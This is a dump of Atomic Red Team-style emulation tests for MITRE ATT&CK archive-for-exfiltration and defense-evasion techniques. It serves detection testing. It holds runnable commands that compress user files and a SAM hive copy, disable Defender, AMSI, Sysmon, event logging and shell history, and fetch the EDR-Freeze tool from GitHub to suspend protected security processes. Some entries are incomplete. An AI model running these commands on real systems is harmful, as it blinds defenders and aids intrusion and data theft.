Description: Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
T1560.001 - Archive Collected Data: Archive via Utility
Compress Data for Exfiltration With Rar
"%programfiles%/WinRAR/Rar.exe" a -r %USERPROFILE%\T1560.001-data.rar %USERPROFILE%\*.txt
Description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration.
When the test completes you should find the txt files from the %USERPROFILE% directory compressed in a file called T1560.001-data.rar in the %USERPROFILE% directory
Prereq: Rar tool must be installed at specified location (%programfiles%/WinRAR/Rar.exe)
if not exist "%programfiles%/WinRAR/Rar.exe" (exit /b 1)
Cleanup:
del /f /q /s %USERPROFILE%\T1560.001-data.rar >nul 2>&1
T1560.001 - Archive Collected Data: Archive via Utility
Compress Data and lock with password for Exfiltration with winrar
mkdir .\tmp\victim-files cd .\tmp\victim-files echo "This file will be encrypted" > .\encrypted_file.txt "%programfiles%/WinRAR/Rar.exe" a -hp"blue" hello.rar dir
Description: Note: Requires winrar installation
rar a -p"blue" hello.rar (VARIANT)
Prereq: Rar tool must be installed at specified location (%programfiles%/WinRAR/Rar.exe)
if not exist "%programfiles%/WinRAR/Rar.exe" (exit /b 1)
T1560.001 - Archive Collected Data: Archive via Utility
Compress Data and lock with password for Exfiltration with winzip
path=%path%;"C:\Program Files (x86)\winzip" mkdir .\tmp\victim-files cd .\tmp\victim-files echo "This file will be encrypted" > .\encrypted_file.txt "%ProgramFiles%\WinZip\winzip64.exe" -min -a -s"hello" archive.zip * dir
T1560.001 - Archive Collected Data: Archive via Utility
Compress Data and lock with password for Exfiltration with 7zip
mkdir $T1560.001\victim-files cd $T1560.001\victim-files echo "This file will be encrypted" > .\encrypted_file.txt "%ProgramFiles%\7-zip\7z.exe" u archive.7z *txt -pblue dir
Description: Note: This test requires 7zip installation
Prereq: 7zip tool must be installed at specified location (%ProgramFiles%\7-zip\7z.exe)
if not exist "%ProgramFiles%\7-zip\7z.exe" (exit /b 1)
Cleanup:
rmdir /s /Q $T1560.001\victim-files >nul 2>&1
T1560.001 - Archive Collected Data: Archive via Utility
Data Compressed - nix - zip
zip $HOME/data.zip /var/log/{w,b}tmp
Description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression.
Prereq: Files to zip must exist (/var/log/{w,b}tmp)
Description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
Cleanup:
rm -f $HOME/victim-gzip.txt.gz
T1560.001 - Archive Collected Data: Archive via Utility
Data Compressed - nix - tar Folder or File
tar -cvzf $HOME/data.tar.gz $HOME/$USERNAME
Description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
Prereq: Folder to zip must exist ($HOME/$USERNAME)
test -e $HOME/$USERNAME
Cleanup:
rm -f $HOME/data.tar.gz
T1560.001 - Archive Collected Data: Archive via Utility
Data Encrypted with zip and gpg symmetric
mkdir -p /tmp/T1560 cd /tmp/T1560; touch a b c d e f g zip --password "InsertPasswordHere" /tmp/T1560/T1560 ./* echo "InsertPasswordHere" | gpg --batch --yes --passphrase-fd 0 --output /tmp/T1560/T1560.zip.gpg -c /tmp/T1560/T1560.zip ls -l /tmp/T1560
Description: Encrypt data for exiltration
Prereq: gpg and zip are required to run the test.
if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi;
Cleanup:
rm -Rf /tmp/T1560
T1560.001 - Archive Collected Data: Archive via Utility
Description: An adversary may compress all the collected data, encrypt and send them to a C2 server using base64 encoding.
This atomic test tries to emulate the behaviour of the FLEXIROOT backdoor to archive the collected data. FLEXIROOT typically utilizes AES encryption and base64 encoding to transfer the encrypted data to the C2 server.
In this test, standard zip compression and the OpenSSL library are used to encrypt the compressed data.
https://attack.mitre.org/versions/v7/software/S0267/
Prereq: The folder and test files must exist
if [ ! -d /tmp/t1560 ]; then exit 1; else exit 0; fi;
Cleanup:
rm -rf /tmp/t1560
T1560.001 - Archive Collected Data: Archive via Utility
ESXi - Remove Syslog remote IP
# Extract line with IP address from the syslog configuration output ..\ExternalPayloads\plink.exe -ssh atomic.local -l root -pw n/a -m ..\atomics\T1560.001\src\esxi_get_loghost.txt | findstr /r "[0-9]*\.[0-9]*\.[0-9]*\." > c:\temp\loghost.txt
# Replace the IP with "0" ..\ExternalPayloads\plink.exe -ssh atomic.local -l root -pw n/a -m ..\atomics\T1560.001\src\esxi_remove_loghost.txt
# Extract the IP from the line extracted from findstr $inputFilePath = "c:\temp\loghost.txt" $outputFilePath = "c:\temp\loghost_ip.txt"
if ([string]::IsNullOrWhiteSpace($fileContent)) { Write-Host "The content is $fileContent" Write-Host "The file is empty" } else { # Use a regular expression to extract IP addresses $ipAddresses = [regex]::Matches($fileContent, '(udp|tcp):\/\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value
$output = "esxcli system syslog config set --loghost=" + $ipAddresses
Write-Host "IP addresses extracted and saved to $outputFilePath" }
Description: An adversary may edit the syslog config to remove the loghost in order to prevent or redirect logs being received by SIEM.
Prereq: The plink executable must be found in the ExternalPayloads folder.
if (Test-Path "..\ExternalPayloads\plink.exe") {exit 0} else {exit 1}
Cleanup:
# Re-add the initially extracted IP ..\ExternalPayloads\plink.exe -ssh atomic.local -l root -pw n/a -m c:\temp\loghost_ip.txt
rm c:\temp\loghost_ip.txt rm c:\temp\loghost.txt
T1560.001 - Archive Collected Data: Archive via Utility
Compress a File for Exfiltration using Makecab
makecab.exe C:\Temp\sam.hiv C:\Temp\art.zip
Description: An adversary may compress data using Makecab (in-built Windows binary) that is collected prior to exfiltration.
[reference](https://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/)
Prereq: A sample file for compression must be located at specified location (C:\Temp\sam.hiv)
if not exist "C:\Temp\sam.hiv" (exit /b 1)
Cleanup:
del C:\Temp\art.zip
T1560.001 - Archive Collected Data: Archive via Utility
Description: Uses tarfile from Python to compress files
Prereq: Requires Python
which python || which python3
Cleanup:
rm /tmp/passwd.tar.gz
T1560 - Archive Collected Data
Compress Data for Exfiltration With PowerShell
dir $env:USERPROFILE -Recurse | Compress-Archive -DestinationPath $env:USERPROFILE\T1560-data-ps.zip
Description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration.
When the test completes you should find the files from the $env:USERPROFILE directory compressed in a file called T1560-data-ps.zip in the $env:USERPROFILE directory
T1562.001 - Impair Defenses: Disable or Modify Tools
Unload Sysmon Filter Driver
fltmc.exe unload SysmonDrv
Description: Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution,
run the prereq_command's and it should fail with an error of "sysmon filter must be loaded".
Description: Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
Upon execution, no output is displayed.
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
Description: With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
This test removes the Windows Defender provider registry key. Upon execution, no output is displayed.
Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\" to verify that it is gone.
Description: With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed.
Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service.
To verify that the service has stopped, run "sc query McAfeeDLPAgentService"
Description: Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled
in Windows settings.
Description: Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator.
However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied"
will be displayed twice and the WinDefend service status will be displayed.
Description: Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be
grayed out and have no info.
Description: Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not
show any warning before editing the document.
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
Description: Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments.
On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the
command will say completed.
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
T1562.001 - Impair Defenses: Disable or Modify Tools
Stop and Remove Arbitrary Security Windows Service
Description: Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database.
T1562.001 - Impair Defenses: Disable or Modify Tools
Description: Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller.
T1562.001 - Impair Defenses: Disable or Modify Tools
Tamper with Windows Defender Evade Scanning -Folder
Description: Malware can exclude a specific path from being scanned and evading detection.
Upon successul execution, the file provided should be on the list of excluded path.
To check the exclusion list using poweshell (Get-MpPreference).ExclusionPath
Description: Malware can exclude specific extensions from being scanned and evading detection.
Upon successful execution, the extension(s) should be on the list of excluded extensions.
To check the exclusion list using poweshell (Get-MpPreference).ExclusionExtension.
Description: Malware can exclude specific processes from being scanned and evading detection.
Upon successful execution, the process(es) should be on the list of excluded processes.
To check the exclusion list using poweshell (Get-MpPreference).ExclusionProcess."
Description: The following Atomic will attempt to disable Windows-Defender using the built in DISM.exe, Deployment Image Servicing and Management tool.
DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.
A successful execution will not standard-out any details. Remove the quiet switch if verbosity is needed.
This method will remove Defender and it's package.
T1562.001 - Impair Defenses: Disable or Modify Tools
Description: Information on NirSoft AdvancedRun and its creators found here: http://www.nirsoft.net/utils/advanced_run.html
This Atomic will run AdvancedRun.exe with similar behavior identified during the WhisperGate campaign.
See https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3
Upon successful execution, AdvancedRun.exe will attempt to run and stop Defender, and optionally attempt to delete the Defender folder on disk.
Prereq: Advancedrun.exe must exist at ..\ExternalPayloads\AdvancedRun.exe
Description: Backstab loads Process Explorer driver which is signed by Microsoft and use it to terminate running processes protected by antimalware software such as MsSense.exe or MsMpEng.exe, which is otherwise not possible to kill.
https://github.com/Yaxser/Backstab
Prereq: Backstab64.exe should exist in ExtrnalPayloads Directory
if (Test-Path "..\ExternalPayloads\Backstab64.exe") {exit 0} else {exit 1}
T1562.001 - Impair Defenses: Disable or Modify Tools
Description: Attempting to disable scheduled scanning and other parts of Windows Defender ATP using set-MpPreference aliases. Upon execution Virus and Threat Protection will show as disabled
in Windows settings.
Description: The following Atomic will attempt to disable Windows-Defender using the built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.
Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.
A successful execution will not standard-out any details. Remove the quiet switch if verbosity is needed.
This method will remove Defender and it's packages.
Reference: https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps
T1562.001 - Impair Defenses: Disable or Modify Tools
WMIC Tamper with Windows Defender Evade Scanning Folder
wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"ATOMICREDTEAM\"
Description: The following Atomic will attempt to exclude a folder within Defender leveraging WMI
Reference: https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
Cleanup:
wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Remove ExclusionPath=\"ATOMICREDTEAM\"
T1562.001 - Impair Defenses: Disable or Modify Tools
Description: The following atomic test will delete the Windows Defender scheduled tasks.
[Reference](https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/)
Prereq: The Windows Defender scheduled tasks must be backed up first
T1562.001 - Impair Defenses: Disable or Modify Tools
Clear History
history -c
Description: Clear Shell History. This technique only affect the bash shell application.
T1562.001 - Impair Defenses: Disable or Modify Tools
Suspend History
set +o history
Description: suspend Shell History seen in Awfulshred wiper- https://unix.stackexchange.com/questions/10922/temporarily-suspend-bash-history-on-a-given-shell
Cleanup:
set -o history
T1562.001 - Impair Defenses: Disable or Modify Tools
Description: clear pagging cache via system request. This is a temporary change in the system to clear paging cache. This technique seen in Awfulshred wiper as part
of its malicious payload on the compromised host. added reference link for this technique: https://www.tecmint.com/clear-ram-memory-cache-buffer-and-swap-space-on-linux/
T1562.001 - Impair Defenses: Disable or Modify Tools
Disable Memory Swap
swapon -a sleep 2 swapoff -a sync
Description: disable swapping of device paging that impaire the compromised host to swap data if the RAM is full. Awfulshred wiper used this technique as an additional
payload to the compromised host and to make sure that there will be no recoverable data due to swap feature of FreeBSD/linux.
Cleanup:
swapon -a sleep 2 sync
T1562.001 - Impair Defenses: Disable or Modify Tools
Description: This test disables Hypervisor-Enforced Code Integrity (HVCI) by setting the registry key HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity "Enabled" value to "0".
The pre-req needs to be ran in order to setup HVCI and have it enabled.
We do not recommend running this in production.
[Black Lotus Campaign](https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/)
[Microsoft](https://learn.microsoft.com/en-us/windows/security/threat-protection/device-guard/enable-virtualization-based-protection-of-code-integrity)
Description: With administrative rights, an adversary can disable AMSI via registry value in HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} by overriding the Microsoft Defender COM object for AMSI and points it to a DLL that does not exist.
This is currently being used by AsyncRAT and others.
https://strontic.github.io/xcyclopedia/library/clsid_fdb00e52-a214-4aa1-8fba-4357bb0072ec.html
https://securitynews.sonicwall.com/xmlpost/asyncrat-variant-includes-cryptostealer-capabilites/
Description: With root privileges, an adversary can disable real time protection. Note, this test assumes Defender is not in passive mode and real-time protection is enabled. The use of a managed.json on Linux or Defender .plist on MacOS will prevent these changes. Tamper protection will also prevent this (available on MacOS, but not Linux at the time of writing). Installation of MDATP is a prerequisite. Installation steps vary across MacOS and Linux distros. See Microsoft public documentation for instructions: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/mac-install-manually?view=o365-worldwide https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/linux-install-manually?view=o365-worldwide
Description: An adversary may disable account lockout policy within ESXi to have the ability to prevent defensive actions from being enforced in the future or to prevent future alerting.
Prereq: Check if VMWARE PowerCLI PowerShell Module is installed.
Remove-ItemProperty -Path $registryPath -Name $registryValueName Write-Host "Registry value deleted: $registryValueName"
Description: This test simulates the deletion of the ASR rules loaded by Microsoft Defender using the registry. Depending on the deployment, rules can be pushed either using GPO or InTune, This test simulates an InTune-based rules deployment.
T1562.001 - Impair Defenses: Disable or Modify Tools
$newValueName = "36190899-1602-49e8-8b27-eb1d0a1ce869" $newValueData = "1" New-ItemProperty -Path $registryPath -Name $newValueName -PropertyType String -Value $newValueData -Force Write-Host "Registry value created: $newValueName with data $newValueData"
Remove-ItemProperty -Path $registryPath -Name $newValueName Write-Host "Registry value deleted: $newValueName"
Description: This test simulates the deletion of the ASR rules loaded by Microsoft Defender using the registry. Depending on the deployment, rules can be pushed either using GPO or InTune, This test simulates a GPO-based rules deployment.
T1562.001 - Impair Defenses: Disable or Modify Tools
Description: Threat Actor could disable the AMSI function by adding a registry value name “AmsiEnable” to the registry key “HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable” and set its value to 0.
Ref: https://mostafayahiax.medium.com/hunting-for-amsi-bypassing-methods-9886dda0bf9d
Description: This atomic simulates an activity where an attacker disables the EventLog-Application ETW Auto Logger session using the reg.exe utility to update the Windows registry value "Start". This would effectivly disable the Event log application channel. The changes would only take effect after a restart.
Description: This atomic simulates an activity where an attacker disables the EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry value "Start". This would effectivly disable the Event log application channel. The changes would only take effect after a restart.
Description: This atomic simulates an activity where an attacker disables a specific ETW provider from the EventLog-Application ETW Auto Logger session using the reg.exe utility to update the Windows registry value "Enabled". This would effectivly remove that provider from the session and cause to not emit any logs of that type. The changes would only take effect after a restart.
Description: This atomic simulates an activity where an attacker disables a specific ETW provider from the EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry value "Enabled". This would effectivly remove that provider from the session and cause to not emit any logs of that type. The changes would only take effect after a restart.
T1562.001 - Impair Defenses: Disable or Modify Tools
Freeze PPL-protected process with EDR-Freeze
# Enable SeDebugPrivilege Add-Type -TypeDefinition @" using System; using System.Runtime.InteropServices;
public class TokenAdjuster { [DllImport("advapi32.dll", SetLastError = true)] public static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
[DllImport("advapi32.dll", SetLastError = true)] public static extern bool LookupPrivilegeValue(string lpSystemName, string lpName, out long lpLuid);
# Get the folder of the current script $scriptFolder = Split-Path -Parent $MyInvocation.MyCommand.Definition
# Download latest EDR-Freeze package and extract (force replace) $downloadUrl = "https://github.com/TwoSevenOneT/EDR-Freeze/releases/download/main/EDR-Freeze_1.0.zip" $zipPath = Join-Path $scriptFolder "EDR-Freeze_1.0.zip" Write-Host "Downloading latest EDR-Freeze from $downloadUrl" -ForegroundColor Cyan try { Invoke-WebRequest -Uri $downloadUrl -OutFile $zipPath -UseBasicParsing -ErrorAction Stop Write-Host "Download completed: $zipPath" -ForegroundColor Green $extractFolder = $scriptFolder if (Test-Path $zipPath) { Write-Host "Extracting archive to $extractFolder (overwriting existing files)" -ForegroundColor Cyan if (Test-Path $extractFolder) { # Ensure target exe not locked; attempt to stop any running instance silently Get-Process -Name "EDR-Freeze_1.0" -ErrorAction SilentlyContinue | Stop-Process -Force -ErrorAction SilentlyContinue } Add-Type -AssemblyName System.IO.Compression.FileSystem 2>$null # Custom extraction routine (overwrite existing) compatible with .NET Framework (no bool overwrite overload) $archive = $null try { $archive = [System.IO.Compression.ZipFile]::OpenRead($zipPath) foreach ($entry in $archive.Entries) { if ([string]::IsNullOrWhiteSpace($entry.FullName)) { continue } if ($entry.FullName.EndsWith('/')) { # directory entry $dirPath = Join-Path $extractFolder $entry.FullName if (-not (Test-Path $dirPath)) { New-Item -ItemType Directory -Path $dirPath -Force | Out-Null } continue } $destPath = Join-Path $extractFolder $entry.FullName $destDir = Split-Path $destPath -Parent if (-not (Test-Path $destDir)) { New-Item -ItemType Directory -Path $destDir -Force | Out-Null } if (Test-Path $destPath) { Remove-Item -Path $destPath -Force -ErrorAction SilentlyContinue } try { # Use static extension method (PowerShell 5.1 compatible) [System.IO.Compression.ZipFileExtensions]::ExtractToFile($entry, $destPath, $false) } catch { Write-Host "Failed to extract entry $($entry.FullName): $_" -ForegroundColor Yellow } } Write-Host "Extraction completed." -ForegroundColor Green } finally { if ($archive) { $archive.Dispose() } } } } catch { Write-Host "Failed to download or extract EDR-Freeze: $_" -ForegroundColor Red }
# Wait 15s before putting targeted process before putting it in the comma Write-Host "Waiting 15s before putting $processName in the comma" -ForegroundColor Yellow Start-Sleep -Seconds 5 Write-Host "Waiting 10s before putting $processName in the comma" -ForegroundColor Yellow Start-Sleep -Seconds 5 Write-Host "Waiting 5s before putting $processName in the comma" -ForegroundColor Yellow Start-Sleep -Seconds 3 Write-Host "Waiting 2s before putting $processName in the comma" -ForegroundColor Yellow Start-Sleep -Seconds 2
# Put targeted process in the comma for 15s # Discover the EDR-Freeze executable dynamically (pick most recent if multiple) $edrFreezeExeName = Get-ChildItem -Path $scriptFolder -Filter 'EDR-Freeze_*.exe' -ErrorAction SilentlyContinue | Sort-Object LastWriteTime -Descending | Select-Object -First 1 -ExpandProperty Name if (-not $edrFreezeExeName) { Write-Host "No EDR-Freeze executable (EDR-Freeze_*.exe) found in $scriptFolder" -ForegroundColor Red exit 1 }
$edrFreezeExe = Join-Path $scriptFolder $edrFreezeExeName Write-Host "Using EDR-Freeze executable: $edrFreezeExeName" -ForegroundColor Cyan Write-Host "$processName putted in the comma for 15s, by targetting Process ID $($htaProcess.Id)" -ForegroundColor Yellow Start-Process -FilePath $edrFreezeExe -ArgumentList ("$($process.Id) 15000") | Out-Null
Description: This test utilizes the tool EDR-Freeze, which leverages the native Microsoft binary WerFaultSecure.exe to suspend processes protected by the Protected Process Light mechanism. PPL is a Windows security feature designed to safeguard critical system processes — such as those related to antivirus, credential protection, and system integrity — from tampering or inspection. These processes operate in a restricted environment that prevents access even from administrators or debugging tools, unless the accessing tool is signed and trusted by Microsoft. By using WerFaultSecure.exe, which is inherently trusted by the operating system, EDR-Freeze is able to bypass these restrictions and temporarily freeze PPL-protected processes for analysis or testing purposes.
T1562.001 - Impair Defenses: Disable or Modify Tools
Disable ASLR Via sysctl parameters - Linux
sysctl -w kernel.randomize_va_space=0
Description: Detects Execution of the `sysctl` command to set `kernel.randomize_va_space=0` which disables Address Space Layout Randomization (ASLR) in Linux.
Cleanup:
sysctl -w kernel.randomize_va_space=2
T1562.002 - Impair Defenses: Disable Windows Event Logging
Disable Windows IIS HTTP Logging
C:\Windows\System32\inetsrv\appcmd.exe set config "Default Web Site" /section:httplogging /dontLog:true
Description: Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
This action requires HTTP logging configurations in IIS to be unlocked.
Use the cleanup commands to restore some default auditpol settings (your original settings will be lost)
Cleanup:
if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){ C:\Windows\System32\inetsrv\appcmd.exe set config "Default Web Site" /section:httplogging /dontLog:false *>$null }
T1562.002 - Impair Defenses: Disable Windows Event Logging
Description: Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
This action requires HTTP logging configurations in IIS to be unlocked.
Use the cleanup commands to restore some default auditpol settings (your original settings will be lost)
Cleanup:
if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){ C:\Windows\System32\inetsrv\appcmd.exe set config "Default Web Site" /section:httplogging /dontLog:false *>$null }
T1562.002 - Impair Defenses: Disable Windows Event Logging
Description: Kill Windows Event Log Service Threads using Invoke-Phant0m. WARNING you will need to restart PC to return to normal state with Log Service. https://artofpwn.com/phant0m-killing-windows-event-log.html
Cleanup:
Write-Host "NEED TO Restart-Computer TO ENSURE LOGGING RETURNS" -fore red Remove-Item "$env:TEMP\Invoke-Phant0m.ps1" -ErrorAction Ignore
T1562.002 - Impair Defenses: Disable Windows Event Logging
Description: Disables the windows audit policy to prevent key host based telemetry being written into the event logs.
[Solarigate example](https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/)
T1562.002 - Impair Defenses: Disable Windows Event Logging
Clear Windows Audit Policy Config
auditpol /clear /y auditpol /remove /allusers
Description: Clear the Windows audit policy using auditpol utility. This action would stop certain audit events from being recorded in the security log.
Description: This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
Description: This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
Description: This test simulates an adversary modifying access permissions for a Windows Event Log channel by setting the "CustomSD" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
T1562.003 - Impair Defenses: Impair Command History Logging
Disable history collection
export HISTCONTROL=ignoreboth whoami
Description: Disables history collection in shells
T1562.003 - Impair Defenses: Impair Command History Logging
Disable history collection (freebsd)
export HISTSIZE=0 whoami
Description: Disables history collection in shells
T1562.003 - Impair Defenses: Impair Command History Logging
Mac HISTCONTROL
{MISSING IN ATOMIC RED TEAM}
Description: The HISTCONTROL variable is set to ignore (not write to the history file) command that are a duplicate of something already in the history
and commands that start with a space. This atomic sets this variable in the current session and also writes it to the current user's ~/.bash_profile
so that it will apply to all future settings as well.
https://www.linuxjournal.com/content/using-bash-history-more-efficiently-histcontrol
T1562.003 - Impair Defenses: Impair Command History Logging
Clear bash history
cp $HISTFILE $HISTFILE.OLD if ((${#HISTFILE[@]})); then echo $HISTFILE; fi echo "" > $HISTFILE if [ $(wc -c <$HISTFILE) -gt 1 ]; then echo "$HISTFILE is larger than 1k"; fi ls -la $HISTFILE cat $HISTFILE history -c if [ $(history |wc -l) -eq 1 ]; then echo "History cache cleared"; fi
Description: An attacker may clear the bash history cache and the history file as their last act before logging off to remove the record of their command line activities.
In this test we use the $HISTFILE variable throughout to 1. confirms the $HISTFILE variable is set 2. echo "" into it 3..5 confirm the file is empty 6 clear the history cache 7. confirm the history cache is empty. This is when the attacker would logoff.
Cleanup:
mv -f $HISTFILE.OLD $HISTFILE
T1562.003 - Impair Defenses: Impair Command History Logging
Setting the HISTCONTROL environment variable
TEST=$(echo $HISTCONTROL) if [ "$HISTCONTROL" != "ignoreboth" ]; then export HISTCONTROL="ignoreboth"; fi history -c ls -la $HISTFILE # " ls -la $HISTFILE" if [ $(history |wc -l) -eq 1 ]; then echo "ls -la is not in history cache"; fi if [ "$HISTCONTROL" != "erasedups" ]; then export HISTCONTROL="erasedups"; fi history -c ls -la $HISTFILE ls -la $HISTFILE ls -la $HISTFILE if [ $(history |wc -l) -eq 2 ]; then echo "Their is only one entry for ls -la $HISTFILE"; fi
Description: An attacker may exploit the space before a command (e.g. " ls") or the duplicate command suppression feature in Bash history to prevent their commands from being recorded in the history file or to obscure the order of commands used.
In this test we 1. sets $HISTCONTROL to ignoreboth 2. clears the history cache 3. executes ls -la with a space in-front of it 4. confirms that ls -la is not in the history cache 5. sets $HISTCONTROL to erasedups 6. clears the history cache 7..9 executes ls -la $HISTFILE 3 times 10. confirms that their is only one command in history
Cleanup:
export HISTCONTROL=$(echo $TEST)
T1562.003 - Impair Defenses: Impair Command History Logging
Setting the HISTFILESIZE environment variable
TEST=$(echo $HISTFILESIZE) echo $HISTFILESIZE export HISTFILESIZE=0 echo "runnning some commands to populate the history" whoami groups if [ $(echo $HISTFILESIZE) -eq 0 ]; then echo "\$HISTFILESIZE is zero"; else HIST_LENGHT=$(wc -l $HISTFILE); echo "\$HISTFILESIZE is not zero, history lenght is $HIST_LENGHT"; fi
Description: An Adversary may set the bash history files size environment variable (HISTFILESIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
Note: we don't wish to log out, so we are just confirming the value of HISTFILESIZE. In this test we 1. echo HISTFILESIZE 2. set it to zero 3. confirm that HISTFILESIZE is set to zero.
Cleanup:
export HISTCONTROL=$(echo $TEST)
T1562.003 - Impair Defenses: Impair Command History Logging
Setting the HISTSIZE environment variable
echo $HISTSIZE export HISTSIZE=0 echo "runnning some commands to populate the history" whoami groups if [ $(echo $HISTSIZE) -eq 0 ]; then echo "\$HISTSIZE is zero"; else HIST_LENGTH=$(wc -l $HISTFILE); echo "\$HISTSIZE is not zero, history size is $HIST_LENGTH"; fi
Description: An Adversary may set the sh history files size environment variable (HISTSIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
Note: we don't wish to log out, so we are just confirming the value of HISTSIZE. In this test we 1. echo HISTSIZE 2. set it to zero 3. confirm that HISTSIZE is set to zero.
Cleanup:
export HISTSIZE=100
T1562.003 - Impair Defenses: Impair Command History Logging
Setting the HISTFILE environment variable
TEST=$(echo $HISTFILE) echo $HISTFILE export HISTFILE="/dev/null" echo "runnning some commands to populate the history" whoami groups if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; else HIST_LENGHT=$(wc -l $HISTFILE); echo "\$HISTFILE is not /dev/null, history lenght is $HIST_LENGHT"; fi
Description: An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
Cleanup:
export HISTFILE=$(echo $TEST)
T1562.003 - Impair Defenses: Impair Command History Logging
Setting the HISTFILE environment variable (freebsd)
echo $HISTFILE export HISTFILE="/dev/null" if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; fi
Description: An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
Cleanup:
export HISTFILE=~/.sh_history
T1562.003 - Impair Defenses: Impair Command History Logging
Setting the HISTIGNORE environment variable
